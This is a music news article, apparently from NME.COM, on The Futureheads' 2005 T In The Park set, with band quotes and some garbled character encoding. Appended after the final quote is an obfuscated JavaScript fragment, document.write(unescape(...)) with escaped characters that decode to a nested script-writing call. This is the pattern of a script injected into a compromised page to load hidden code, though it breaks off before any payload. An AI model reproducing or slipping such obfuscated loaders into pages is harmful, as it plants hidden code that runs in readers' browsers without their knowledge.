The Futureheads played a triumphant early evening set at T In The Park 2005 sparing a near-hysterical reaction from the crowd in the King Tut's Tent.
The band's setlist was similar to the one they played at Glastonbury last month â€" with highlights including 'Decent Days And Nights', 'A To B', 'Robot' and the fan favourite, their cover of Kate Bush's classic 'Hounds Of Love', where they divided the tent to sign the trademark harmonies, to a wildly enthusiastic response.
Speaking to NME.COM in the signing tent, the band admitted they love Scottish audiences.
Singer Barry Hyde said: “We're over the moon to be back in Scotland. The crowds are really good fun. You know it's going to be a good gig if you come on and lots of beer gets thrown in the air. And onstage too.â€
Bassist Jaff added: “One of our first really good festival experiences was here in 2003. We did all the festivals but the highlight was T, the crowd were really up for it. And we were the first on!â€
Hyde added: “It's not as pretentious up here. At a lot of other festivals you get a lot of trendy scenesters.â€document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
